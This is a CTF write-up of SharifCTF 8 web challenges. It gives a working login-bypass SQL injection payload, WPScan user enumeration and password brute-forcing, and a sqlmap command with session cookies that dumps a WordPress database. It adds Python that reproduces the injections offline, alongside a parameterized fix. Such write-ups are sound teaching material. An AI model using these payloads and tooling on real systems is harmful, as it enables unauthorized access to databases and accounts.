[SharifCTF 8]Web

Author: JasonChiu17 | Published 2018-02-08 13:25, 81 reads

    Hello Rules!!

    Find the flag in the rule page

    • The flag is printed at the very bottom of the rules page; the format given there is the MD5 of the lowercased string:


    • SharifCTF{MD5(lowercase(Hello_Rules))}
    • SharifCTF{eb7971ce6a17d6c15485bbcb6450b6e2}

    Hidden input

    Login if you can :)
    Alternative Link

    • The login form contains a hidden input named debug; change its type to text so it is submitted with the form. That makes the server print the SQL query it executed together with the MySQL error.
    • With that debug output available, build the SQL injection as follows:


    • Probe with a single quote in the username; the response shows the query and the error:
    username: admin'
    password: 123
    SQL query: SELECT * FROM users WHERE username=('admin'') AND password=('123')
    SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '123')' at line 1
    
    Login failed.
    
    • The query template is now known: SELECT * FROM users WHERE username=('admin'') AND password=('123'). The username is wrapped in ('...'), so the payload has to close the quote and the parenthesis, append an always-true condition, and comment out the rest of the statement (-- - is a MySQL line comment; the trailing dash makes sure the required space after -- survives even if trailing whitespace is stripped):


    username: admin') or 1=1 -- - 
    password: 123
    SQL query: SELECT * FROM users WHERE username=('admin') or 1=1 -- - ') AND password=('123')
    
    Logged in!
    
    Your flag is: SharifCTF{c58a108967c46222bbdc743e15932c26}
    
    • SharifCTF{c58a108967c46222bbdc743e15932c26}
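    The bypass above, reproduced offline as an added example (my code, not the challenge's): a constructed in-memory SQLite users table, a login function that builds the query by string formatting exactly the way the challenge did, and the parameterized form that the same payload cannot break. The `-- -` comment behaves the same in SQLite as in MySQL, so the original payload can be used unchanged.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the challenge's users table (sample row, not the real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-not-123')")
    return db


def vulnerable_login(db, username, password):
    """Mirrors the challenge: user input dropped into ('...') by string formatting."""
    query = "SELECT * FROM users WHERE username=('%s') AND password=('%s')" % (username, password)
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.OperationalError as err:
        # This is what the challenge's debug field revealed: the broken query and the DBMS error.
        print("SQL query:", query)
        print("SQL error:", err)
        return False


def safe_login(db, username, password):
    """Hardened form: values travel as parameters, so quotes and comments stay data."""
    query = "SELECT * FROM users WHERE username=(?) AND password=(?)"
    return db.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "admin') or 1=1 -- -"
    vulnerable_login(db, "admin'", "123")             # unbalanced quote: leaks the query shape
    print("vulnerable:", vulnerable_login(db, payload, "123"))   # logged in without the password
    print("parameterized:", safe_login(db, payload, "123"))      # still refused
```

    With the payload, the executed statement is `SELECT * FROM users WHERE username=('admin') or 1=1 -- - ') AND password=('123')`: everything after `--` is a comment, and `or 1=1` makes the WHERE clause true for every row. The parameterized query compares the literal string `admin') or 1=1 -- -` against the username column and finds nothing.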

    The news hacker

    Only admin can see the flag :)
    ctf.sharif.edu:8082

    Alternative Link
    Hint: Weak password!

    • WPScan enumerates two users, brute-forces organizer's password (the hint says it is weak, and it is literally "password"), and flags the installed Event List plugin as vulnerable to authenticated SQL injection (CVE-2017-9429):
    [+] Enumerating usernames ...
    [+] Identified the following 2 user/s:
        +----+-----------+-----------+
        | Id | Login     | Name      |
        +----+-----------+-----------+
        | 1  | admin     | admin     |
        | 2  | organizer | organizer |
        +----+-----------+-----------+
    [!] Default first WordPress username 'admin' is still used
    
    +----+-----------+-----------+----------+
    | Id | Login     | Name      | Password |
    +----+-----------+-----------+----------+
    | 1  | admin     | admin     |          |
    | 2  | organizer | organizer | password |
    +----+-----------+-----------+----------+
    
    [!] Title: Event List <= 0.7.8 - Authenticated SQL Injection
        Reference: https://wpvulndb.com/vulnerabilities/8846
        Reference: https://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
        Reference: https://plugins.trac.wordpress.org/changeset/1676971/event-list
        Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9429
    [i] Fixed in: 0.7.9
    
    • Use sqlmap on the id parameter of the Event List edit page. The page needs an authenticated WordPress session (without one sqlmap only sees a 302 redirect to the login page), so the organizer login cookies are passed with --cookie, and --sql-shell opens an interactive query prompt:
    (py2) C:\Users\JasonC17\sqlmap-master>python sqlmap.py -u "http://8082.ctf.certcc.ir/wp-admin/admin.php?page=el_admin_main&action=edit&id=1" -p id --cookie="wordpress_eb2a34d2fb7f6ae7debb807cd7821561=organizer%7C1518184954%7CF2ePvBQYbxKxrIfX5Z6r7OmKrnEFN2cHpU5tNY1GSi0%7Cf2f1c9e38708813b4245134bcf1c97c991103fcb5537046132560e136ab2e44d; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_eb2a34d2fb7f6ae7debb807cd7821561=organizer%7C1518184954%7CF2ePvBQYbxKxrIfX5Z6r7OmKrnEFN2cHpU5tNY1GSi0%7Cb6c3b4e40024c05877daebebd37e94df38e240a92d856539e1f81e79d3d0e685; wp-settings-2=svgonload%3DnewImagesrc%26editor%3Dtinymce%26mfold%3Do%26uploader%3D1; wp-settings-time-2=1518063824" --sql-shell
            ___
           __H__
     ___ ___[(]_____ ___ ___  {1.1.3.14#dev}
    |_ -| . [,]     | .'| . |
    |___|_  [']_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 12:54:27
    
    [12:54:27] [INFO] resuming back-end DBMS 'mysql'
    [12:54:27] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: page=el_admin_main&action=edit&id=1 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 11 columns
        Payload: page=el_admin_main&action=edit&id=-7860 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b707871,0x6754615542794e724d4f737058645a6e7a736a7764467a766e53705245494563555269464e4d7364,0x71766a7171),NULL,NULL-- PFpR
    ---
    [12:54:28] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    [12:54:28] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
    sql-shell> select table_name from information_schema.tables
    [12:54:58] [INFO] fetching SQL SELECT statement query output: 'select table_name from information_schema.tables'
    [12:54:59] [WARNING] reflective value(s) found and filtering out
    [12:54:59] [INFO] the SQL query used returns 97 entries
    [12:55:00] [INFO] retrieved: CHARACTER_SETS
    [12:55:01] [INFO] retrieved: COLLATIONS
    [12:55:01] [INFO] retrieved: COLLATION_CHARACTER_SET_APPLICABILITY
    [12:55:02] [INFO] retrieved: COLUMNS
    [12:55:05] [INFO] retrieved: COLUMN_PRIVILEGES
    [12:55:06] [INFO] retrieved: ENGINES
    [12:55:07] [INFO] retrieved: EVENTS
    [12:55:08] [INFO] retrieved: FILES
    [12:55:09] [INFO] retrieved: GLOBAL_STATUS
    [12:55:09] [INFO] retrieved: GLOBAL_VARIABLES
    [12:55:10] [INFO] retrieved: KEY_COLUMN_USAGE
    [12:55:11] [INFO] retrieved: OPTIMIZER_TRACE
    [12:55:12] [INFO] retrieved: PARAMETERS
    [12:55:13] [INFO] retrieved: PARTITIONS
    [12:55:14] [INFO] retrieved: PLUGINS
    [12:55:15] [INFO] retrieved: PROCESSLIST
    [12:55:16] [INFO] retrieved: PROFILING
    [12:55:17] [INFO] retrieved: REFERENTIAL_CONSTRAINTS
    [12:55:18] [INFO] retrieved: ROUTINES
    [12:55:19] [INFO] retrieved: SCHEMATA
    [12:55:20] [INFO] retrieved: SCHEMA_PRIVILEGES
    [12:55:21] [INFO] retrieved: SESSION_STATUS
    [12:55:22] [INFO] retrieved: SESSION_VARIABLES
    [12:55:22] [INFO] retrieved: STATISTICS
    [12:55:23] [INFO] retrieved: TABLES
    [12:55:24] [INFO] retrieved: TABLESPACES
    [12:55:25] [INFO] retrieved: TABLE_CONSTRAINTS
    [12:55:26] [INFO] retrieved: TABLE_PRIVILEGES
    [12:55:27] [INFO] retrieved: TRIGGERS
    [12:55:28] [INFO] retrieved: USER_PRIVILEGES
    [12:55:29] [INFO] retrieved: VIEWS
    [12:55:30] [INFO] retrieved: INNODB_LOCKS
    [12:55:31] [INFO] retrieved: INNODB_TRX
    [12:55:31] [INFO] retrieved: INNODB_SYS_DATAFILES
    [12:55:32] [INFO] retrieved: INNODB_FT_CONFIG
    [12:55:33] [INFO] retrieved: INNODB_SYS_VIRTUAL
    [12:55:34] [INFO] retrieved: INNODB_CMP
    [12:55:35] [INFO] retrieved: INNODB_FT_BEING_DELETED
    [12:55:39] [INFO] retrieved: INNODB_CMP_RESET
    [12:55:40] [INFO] retrieved: INNODB_CMP_PER_INDEX
    [12:55:41] [INFO] retrieved: INNODB_CMPMEM_RESET
    [12:55:42] [INFO] retrieved: INNODB_FT_DELETED
    [12:55:43] [INFO] retrieved: INNODB_BUFFER_PAGE_LRU
    [12:55:44] [INFO] retrieved: INNODB_LOCK_WAITS
    [12:55:45] [INFO] retrieved: INNODB_TEMP_TABLE_INFO
    [12:55:45] [INFO] retrieved: INNODB_SYS_INDEXES
    [12:55:46] [INFO] retrieved: INNODB_SYS_TABLES
    [12:55:47] [INFO] retrieved: INNODB_SYS_FIELDS
    [12:55:48] [INFO] retrieved: INNODB_CMP_PER_INDEX_RESET
    [12:55:49] [INFO] retrieved: INNODB_BUFFER_PAGE
    [12:55:50] [INFO] retrieved: INNODB_FT_DEFAULT_STOPWORD
    [12:55:51] [INFO] retrieved: INNODB_FT_INDEX_TABLE
    [12:55:52] [INFO] retrieved: INNODB_FT_INDEX_CACHE
    [12:55:53] [INFO] retrieved: INNODB_SYS_TABLESPACES
    [12:55:54] [INFO] retrieved: INNODB_METRICS
    [12:55:55] [INFO] retrieved: INNODB_SYS_FOREIGN_COLS
    [12:55:56] [INFO] retrieved: INNODB_CMPMEM
    [12:55:57] [INFO] retrieved: INNODB_BUFFER_POOL_STATS
    [12:55:58] [INFO] retrieved: INNODB_SYS_COLUMNS
    [12:55:59] [INFO] retrieved: INNODB_SYS_FOREIGN
    [12:56:00] [INFO] retrieved: INNODB_SYS_TABLESTATS
    [12:56:01] [INFO] retrieved: wp_app_user_info
    [12:56:02] [INFO] retrieved: wp_bwg_album
    [12:56:03] [INFO] retrieved: wp_bwg_album_gallery
    [12:56:04] [INFO] retrieved: wp_bwg_gallery
    [12:56:05] [INFO] retrieved: wp_bwg_image
    [12:56:06] [INFO] retrieved: wp_bwg_image_comment
    [12:56:07] [INFO] retrieved: wp_bwg_image_rate
    [12:56:08] [INFO] retrieved: wp_bwg_image_tag
    [12:56:09] [INFO] retrieved: wp_bwg_shortcode
    [12:56:10] [INFO] retrieved: wp_bwg_theme
    [12:56:11] [INFO] retrieved: wp_commentmeta
    [12:56:12] [INFO] retrieved: wp_comments
    [12:56:13] [INFO] retrieved: wp_event_list
    [12:56:14] [INFO] retrieved: wp_links
    [12:56:15] [INFO] retrieved: wp_options
    [12:56:16] [INFO] retrieved: wp_postmeta
    [12:56:17] [INFO] retrieved: wp_posts
    [12:56:18] [INFO] retrieved: wp_spidercalendar_calendar
    [12:56:19] [INFO] retrieved: wp_spidercalendar_event
    [12:56:19] [INFO] retrieved: wp_spidercalendar_event_category
    [12:56:20] [INFO] retrieved: wp_spidercalendar_theme
    [12:56:21] [INFO] retrieved: wp_spidercalendar_widget_theme
    [12:56:22] [INFO] retrieved: wp_statistics_exclusions
    [12:56:23] [INFO] retrieved: wp_statistics_historical
    [12:56:24] [INFO] retrieved: wp_statistics_pages
    [12:56:25] [INFO] retrieved: wp_statistics_search
    [12:56:25] [INFO] retrieved: wp_statistics_useronline
    [12:56:26] [INFO] retrieved: wp_statistics_visit
    [12:56:27] [INFO] retrieved: wp_statistics_visitor
    [12:56:28] [INFO] retrieved: wp_term_relationships
    [12:56:29] [INFO] retrieved: wp_term_taxonomy
    [12:56:30] [INFO] retrieved: wp_termmeta
    [12:56:31] [INFO] retrieved: wp_terms
    [12:56:32] [INFO] retrieved: wp_user_profile_follow
    [12:56:33] [INFO] retrieved: wp_usermeta
    [12:56:34] [INFO] retrieved: wp_users
    select table_name from information_schema.tables [97]:
    [*] CHARACTER_SETS
    [*] COLLATION_CHARACTER_SET_APPLICABILITY
    [*] COLLATIONS
    [*] COLUMN_PRIVILEGES
    [*] COLUMNS
    [*] ENGINES
    [*] EVENTS
    [*] FILES
    [*] GLOBAL_STATUS
    [*] GLOBAL_VARIABLES
    [*] INNODB_BUFFER_PAGE
    [*] INNODB_BUFFER_PAGE_LRU
    [*] INNODB_BUFFER_POOL_STATS
    [*] INNODB_CMP
    [*] INNODB_CMP_PER_INDEX
    [*] INNODB_CMP_PER_INDEX_RESET
    [*] INNODB_CMP_RESET
    [*] INNODB_CMPMEM
    [*] INNODB_CMPMEM_RESET
    [*] INNODB_FT_BEING_DELETED
    [*] INNODB_FT_CONFIG
    [*] INNODB_FT_DEFAULT_STOPWORD
    [*] INNODB_FT_DELETED
    [*] INNODB_FT_INDEX_CACHE
    [*] INNODB_FT_INDEX_TABLE
    [*] INNODB_LOCK_WAITS
    [*] INNODB_LOCKS
    [*] INNODB_METRICS
    [*] INNODB_SYS_COLUMNS
    [*] INNODB_SYS_DATAFILES
    [*] INNODB_SYS_FIELDS
    [*] INNODB_SYS_FOREIGN
    [*] INNODB_SYS_FOREIGN_COLS
    [*] INNODB_SYS_INDEXES
    [*] INNODB_SYS_TABLES
    [*] INNODB_SYS_TABLESPACES
    [*] INNODB_SYS_TABLESTATS
    [*] INNODB_SYS_VIRTUAL
    [*] INNODB_TEMP_TABLE_INFO
    [*] INNODB_TRX
    [*] KEY_COLUMN_USAGE
    [*] OPTIMIZER_TRACE
    [*] PARAMETERS
    [*] PARTITIONS
    [*] PLUGINS
    [*] PROCESSLIST
    [*] PROFILING
    [*] REFERENTIAL_CONSTRAINTS
    [*] ROUTINES
    [*] SCHEMA_PRIVILEGES
    [*] SCHEMATA
    [*] SESSION_STATUS
    [*] SESSION_VARIABLES
    [*] STATISTICS
    [*] TABLE_CONSTRAINTS
    [*] TABLE_PRIVILEGES
    [*] TABLES
    [*] TABLESPACES
    [*] TRIGGERS
    [*] USER_PRIVILEGES
    [*] VIEWS
    [*] wp_app_user_info
    [*] wp_bwg_album
    [*] wp_bwg_album_gallery
    [*] wp_bwg_gallery
    [*] wp_bwg_image
    [*] wp_bwg_image_comment
    [*] wp_bwg_image_rate
    [*] wp_bwg_image_tag
    [*] wp_bwg_shortcode
    [*] wp_bwg_theme
    [*] wp_commentmeta
    [*] wp_comments
    [*] wp_event_list
    [*] wp_links
    [*] wp_options
    [*] wp_postmeta
    [*] wp_posts
    [*] wp_spidercalendar_calendar
    [*] wp_spidercalendar_event
    [*] wp_spidercalendar_event_category
    [*] wp_spidercalendar_theme
    [*] wp_spidercalendar_widget_theme
    [*] wp_statistics_exclusions
    [*] wp_statistics_historical
    [*] wp_statistics_pages
    [*] wp_statistics_search
    [*] wp_statistics_useronline
    [*] wp_statistics_visit
    [*] wp_statistics_visitor
    [*] wp_term_relationships
    [*] wp_term_taxonomy
    [*] wp_termmeta
    [*] wp_terms
    [*] wp_user_profile_follow
    [*] wp_usermeta
    [*] wp_users
    
    
    sql-shell> select column_name from information_schema.columns where table_name='wp_posts'
    [13:01:53] [INFO] fetching SQL SELECT statement query output: 'select column_name from information_schema.columns where table_name='wp_posts''
    [13:01:55] [INFO] the SQL query used returns 23 entries
    [13:01:56] [INFO] retrieved: ID
    [13:01:58] [INFO] retrieved: post_author
    [13:01:59] [INFO] retrieved: post_date
    [13:02:00] [INFO] retrieved: post_date_gmt
    [13:02:01] [INFO] retrieved: post_content
    [13:02:01] [INFO] retrieved: post_title
    [13:02:03] [INFO] retrieved: post_excerpt
    [13:02:04] [INFO] retrieved: post_status
    [13:02:05] [INFO] retrieved: comment_status
    [13:02:09] [INFO] retrieved: ping_status
    [13:02:10] [INFO] retrieved: post_password
    [13:02:11] [INFO] retrieved: post_name
    [13:02:12] [INFO] retrieved: to_ping
    [13:02:13] [INFO] retrieved: pinged
    [13:02:14] [INFO] retrieved: post_modified
    [13:02:15] [INFO] retrieved: post_modified_gmt
    [13:02:16] [INFO] retrieved: post_content_filtered
    [13:02:17] [INFO] retrieved: post_parent
    [13:02:18] [INFO] retrieved: guid
    [13:02:19] [INFO] retrieved: menu_order
    [13:02:20] [INFO] retrieved: post_type
    [13:02:21] [INFO] retrieved: post_mime_type
    [13:02:22] [INFO] retrieved: comment_count
    select column_name from information_schema.columns where table_name='wp_posts' [23]:
    [*] comment_count
    [*] comment_status
    [*] guid
    [*] ID
    [*] menu_order
    [*] ping_status
    [*] pinged
    [*] post_author
    [*] post_content
    [*] post_content_filtered
    [*] post_date
    [*] post_date_gmt
    [*] post_excerpt
    [*] post_mime_type
    [*] post_modified
    [*] post_modified_gmt
    [*] post_name
    [*] post_parent
    [*] post_password
    [*] post_status
    [*] post_title
    [*] post_type
    [*] to_ping
    
    sql-shell> select post_content from wp_posts
    [13:03:01] [INFO] fetching SQL SELECT statement query output: 'select post_content from wp_posts'
    [13:03:03] [INFO] the SQL query used returns 13 entries
    [13:03:03] [INFO] retrieved:
    [13:03:06] [INFO] retrieved: <span class="main-article-info">Security researc...
    [13:03:07] [INFO] retrieved:
    [13:03:08] [INFO] retrieved: <strong>Researchers at Proofpoint discovered rec...
    [13:03:09] [INFO] retrieved: Those <span class="link"><a href="https://www.cn...
    [13:03:10] [INFO] retrieved:
    [13:03:12] [INFO] retrieved:
    [13:03:13] [INFO] retrieved: Flag is SharifCTF{e7134abea7438e937b87608eab0d979c}
    [13:03:14] [INFO] retrieved:
    [13:03:15] [INFO] retrieved: The Senior Incident Response Consultant will wor...
    [13:03:16] [INFO] retrieved:  [shortcode atts_1=”test” atts_2=”test”]
    [13:03:17] [INFO] retrieved:
    [13:03:20] [INFO] retrieved:
    select post_content from wp_posts [6]:
    [*]  [shortcode atts_1=”test” atts_2=”test”]
    [*] <span class="main-article-info">Security researchers have discovered several severe vulnerabilities and a secret hard-coded backdoor in Western Digital's My Cloud NAS devices that could allow remote attackers to gain unrestricted root access to the device.\r\n\r\nWestern Digital's My Cloud (WDMyCloud) is one of the most popular network-attached storage devices which is being used by individuals and businesses to host their files, and automatically backup and sync them with various cloud and web-based services.\r\n\r\nThe device lets users not only share files in a home network, but the private cloud feature also allows them to access their data from anywhere at any time.<img class="alignnone size-full wp-image-13" src="http://10.0.3.189/wp-content/uploads/2018/01/81XdO46fI7L._SL1500_.jpg" alt="" width="1500" height="1500" /></span>
    [*] <strong>Researchers at Proofpoint discovered recently that Google Apps Script could have been abused by malicious hackers to automatically download malware hosted on Google Drive to targeted devices.</strong>\r\n\r\nGoogle Apps Script is a JavaScript-based scripting language that allows developers to build web applications and automate tasks. Experts noticed that the service could have been leveraged to deliver malware by using simple triggers, such as onOpen or onEdit.\r\n\r\nIn an <a href="https://www.proofpoint.com/us/corporate-blog/post/new-google-apps-script-vulnerability-extends-url-based-threats-saas-platforms" target="_blank" rel="noopener">attack scenario described by Proofpoint</a>, attackers uploaded a piece of malware to Google Drive and created a public link to it. They then used Google Docs to send the link to the targeted users. Once victims attempted to edit the Google Docs file, the Apps Script triggers would cause the malware to be automatically downloaded to their devices. Researchers said attackers could have used social engineering to convince the target to execute the malware.\r\n\r\nGoogle has implemented new restrictions for simple triggers in an effort to block malware and phishing attacks triggered by opening a document.\r\n\r\nWhile there is no evidence that this method has been exploited in the wild, malicious actors abusing Google Apps Script is not unheard of. A cybercrime group using the infamous Carbanak malware at one point <a href="http://www.securityweek.com/carbanak-hackers-use-google-command-and-control" target="_blank" rel="noopener">leveraged the service</a> for command and control (C&amp;C) communications.\r\n\r\n“SaaS platforms remain a ‘Wild West’ for threat actors and defenders alike. New tools like Google Apps Script are rapidly adding functionality while threat actors look for novel ways of abusing these platforms. 
At the same time, few tools exist that can detect threats generated by or distributed via legitimate software-as-a-service (SaaS) platforms, ” explained Maor Bin, security research lead of Threat Systems Products at Proofpoint.\r\n\r\n“This creates considerable opportunities for threat actors who can leverage newfound vulnerabilities or use ‘good for bad’: making use of legitimate features for malicious purposes,” he added.\r\n\r\nA few months ago, Google announced the introduction of <a href="http://www.securityweek.com/google-warns-users-potentially-risky-web-apps" target="_blank" rel="noopener">new warnings</a> for potentially risky web apps and Apps Scripts.
    [*] Flag is SharifCTF{e7134abea7438e937b87608eab0d979c}
    [*] The Senior Incident Response Consultant will work within established methodologies to perform a variety of Incident Response related activities for Cisco customers, to include responding to cyber incidents, proactively hunting for adversaries in customer networks, designing and performing Table Top Exercises, and performing IR Readiness Assessments.
    [13:03:20] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
    [*] Those <span class="link"><a href="https://www.cnet.com/news/spectre-meltdown-intel-arm-amd-processor-cpu-chip-flaw-vulnerability-faq/">major chip security flaws</a></span>, <span class="link"><a href="https://www.cnet.com/news/chips-exploit-meltdown-spectre-security-flaws-afflict-arm-phones-and-intel-pcs/">detailed Wednesday</a></span>, impact all Macs and <a href="https://www.cnet.com/tags/ios-11/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{&quot;action":"inline-annotation|Apple iOS 11|CNET_TAG|483"}">iOS</a> devices. But <a href="https://www.cnet.com/apple/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple|CNET_COLL|579"}">Apple</a> said downloading its latest software updates fixes one of the vulnerabilities.\r\n\r\nApple on Thursday said all of its computers, <a href="https://www.cnet.com/products/apple-iphone-x/review/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple iPhone X|CNET_FAM_SERIES|558"}">iPhones</a> and <a href="https://www.cnet.com/products/apple-ipad-2017-9-7-inch/review/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple iPad 2017 (9.7-inch)|CNET_FAM_SERIES|285"}">iPads</a> are affected by the two newly discovered flaws, dubbed <a href="https://meltdownattack.com/meltdown.pdf" target="_blank" rel="noopener" data-component="externalLink">Meltdown</a> and <a href="https://spectreattack.com/spectre.pdf" target="_blank" rel="noopener" data-component="externalLink">Spectre</a>. 
It said at that time that the <a href="https://www.cnet.com/products/apple-watch-series-3/review/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple Watch Series 3|CNET_FAM_SERIES|150"}">Apple Watch</a> isn't impacted by Meltdown, and on Friday added that the smartwatch isn't affected by Spectre, either. Apple TVs, meanwhile, are affected.\r\n\r\nThe company didn't immediately give additional information about which <a href="https://www.cnet.com/products/apple-tv-4k/review/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple TV 4K|CNET_FAM_SERIES|225"}">Apple TV</a> models are impacted.\r\n\r\nApple said, though, that "there are no known exploits impacting customers at this time" and that for a hacker to exploit the flaws, there would also have to be a malicious app loaded on a Mac or iOS device. Apple recommended only downloading software from trusted locations like its App Store to avoid software with malware.\r\n<div class="shortcode related-links float_left">\r\n<h3>For more on the chip flaws</h3>\r\n<ul>\r\n \t<li><a href="https://www.cnet.com/news/chips-exploit-meltdown-spectre-security-flaws-afflict-arm-phones-and-intel-pcs/">Major Intel, Arm chip security flaw puts your PCs, phones at risk</a></li>\r\n \t<li><a href="https://www.cnet.com/news/spectre-meltdown-intel-arm-amd-processor-cpu-chip-flaw-vulnerability-faq/">Spectre and Meltdown: Details you need on those big chip flaws</a></li>\r\n \t<li><a href="https://www.cnet.com/news/most-intel-pcs-immune-to-spectre-meltdown-next-week/">Most Intel PCs 'immune' to Spectre, Meltdown by next week</a></li>\r\n \t<li><a href="https://www.cnet.com/how-to/how-to-fix-meltdown-spectre-intel-amd-arm-windows-mac-android-ios/">How to protect yourself from Meltdown and Spectre CPU flaws</a></li>\r\n</ul>\r\n</div>\r\n<div id="inpage-video-top-5a51dc3534bc5" class="ad-inpage-video-top" 
data-ad="inpage-video-top"></div>\r\nApple said iOS 11.2, <a href="https://www.cnet.com/tags/macos-high-sierra/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple macOS High Sierra|CNET_TAG|285"}">MacOS</a> 10.13.2 and TVOS 11.2 already defend against the Meltdown flaw. It plans to release fixes for its Safari browser over the coming days to help defend against the Spectre flaw.\r\n\r\n"We continue to develop and test further mitigations for these issues and will release them in upcoming updates of iOS, MacOS, tvOS and watchOS," Apple said on a<a href="https://support.apple.com/en-us/HT208394" target="_blank" rel="noopener" data-component="externalLink"> support page</a>.\r\n\r\nOn Tuesday, news broke that a newly discovered exploit in most modern <a href="https://www.cnet.com/tags/processors/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Processors|CNET_TAG|502"}">processors</a> could make your computer or phone vulnerable to attacks. Then on Wednesday, <a href="https://www.cnet.com/tags/intel/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Intel|CNET_TAG|1300"}">Intel</a>, Arm and others <span class="link"><a href="https://www.cnet.com/news/chips-exploit-meltdown-spectre-security-flaws-afflict-arm-phones-and-intel-pcs/">acknowledged their processors are affected by the flaws</a></span>.\r\n\r\nIntel supplies chips for most of the world's computers, including Apple's Macs. 
And Arm's architecture is built into nearly every mobile processor, including chips designed by Apple for the iPhone and iPad.\r\n\r\nSeveral researchers, including a member of?<a href="https://googleprojectzero.blogspot.co.uk/2018/01/reading-privileged-memory-with-side.html" target="_blank" rel="noopener" data-component="externalLink">Google's Project Zero</a>?team, found that a design technique used in chips from Intel, Arm and others could allow hackers to access private data from the memory on your device that it shouldn't be able to see. The problem impacts processors going back more than two decades and could let hackers access passwords, encryption keys or sensitive information open in applications.\r\n\r\nThe flaws aren't unique to one particular chipmaker or device. Instead, they impact everything from <a href="https://www.cnet.com/topics/phones/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Phones|CNET_CAT_TOPIC|483"}">phones</a> to PCs and servers. The?<span class="link"><a href="https://www.cnet.com/news/how-to-fix-meltdown-spectre-intel-amd-arm-windows-mac-android-ios/">computing industry is scrambling to lessen the severity of the problem</a></span>?with updates to <a href="https://www.cnet.com/topics/operating-systems/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Operating Systems|CNET_CAT_TOPIC|390"}">operating systems</a>, web browsers, cloud-computing services and other foundations that need to be kept secure.\r\n\r\nIntel on Thursday said that by the end of next week, it expects to have issued <span class="link"><a href="https://www.cnet.com/news/most-intel-pcs-immune-to-spectre-meltdown-next-week/">updates for more than 90 percent of its processors</a></span> introduced within the past five years. The updates make computers "immune from both exploits," Intel said.\r\n\r\nFirst published Jan. 4 at 4:33 a.m. 
PT.\r\n<strong>Update Jan. 4 at 4:45 p.m. PT: </strong>Added background information.\r\n<strong>Update Jan. 5 at 12:07 p.m. PT:</strong> Added that neither Spectre nor Meltdown affects the Apple Watch.
    
    • [*] Flag is SharifCTF{e7134abea7438e937b87608eab0d979c}
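    What sqlmap automated above, as an added example that is not part of the original write-up: a constructed SQLite stand-in for the Event List edit page (eleven selected columns, only two of them rendered, `id` concatenated into the query unquoted), and the attacker-side steps visible in sqlmap's log, namely finding the column count with NULL padding, finding which column is reflected, and reading data out between the qkpxq/qvjqq markers. MySQL's CONCAT(0x..., expr, 0x...) is written with SQLite's || operator here, and the table names, rows and flag string are made up.

```python
import re
import sqlite3

# sqlmap's boundary markers (0x716b707871 / 0x71766a7171 in the log above).
MARK_L, MARK_R = "qkpxq", "qvjqq"


def make_wp_db():
    """Constructed stand-in for the WordPress database; every row is invented."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_posts (ID INTEGER, post_title TEXT, post_content TEXT)")
    db.executemany("INSERT INTO wp_posts VALUES (?, ?, ?)", [
        (1, "WD My Cloud", "Security researchers have discovered several severe ..."),
        (2, "hidden post", "Flag is FLAG{constructed-sample-value}"),
    ])
    cols = ", ".join("c%d TEXT" % i for i in range(1, 11))
    db.execute("CREATE TABLE wp_event_list (id INTEGER, %s)" % cols)
    vals = ", ".join("'v%d'" % i for i in range(1, 11))
    db.execute("INSERT INTO wp_event_list VALUES (1, %s)" % vals)
    return db


def event_edit_page(db, id_param):
    """The vulnerable edit page: id is pasted into the query, the SELECT has
    eleven columns, and only two of them (positions 2 and 9) are rendered."""
    query = ("SELECT id, c1, c2, c3, c4, c5, c6, c7, c8, c9, c10 "
             "FROM wp_event_list WHERE id=%s" % id_param)
    try:
        row = db.execute(query).fetchone()
    except sqlite3.OperationalError:
        return "<h1>Error</h1>"
    if row is None:
        return "<h1>Event not found</h1>"
    return "<h2>%s</h2><p>%s</p>" % (row[1], row[8])


# Attacker side: page(payload) is any callable returning the HTML for ?id=payload.

def find_column_count(page, max_cols=20):
    """Grow a UNION of NULLs until the DBMS stops rejecting the column count."""
    for n in range(1, max_cols + 1):
        if "Error" not in page("-1 UNION ALL SELECT %s-- " % ",".join(["NULL"] * n)):
            return n
    raise RuntimeError("column count not found")


def find_reflected_column(page, ncols):
    """Put the left marker in one column at a time; the first one echoed back is usable."""
    for pos in range(ncols):
        cells = ["NULL"] * ncols
        cells[pos] = "'%s'" % MARK_L
        if MARK_L in page("-1 UNION ALL SELECT %s-- " % ",".join(cells)):
            return pos
    raise RuntimeError("no column is reflected")


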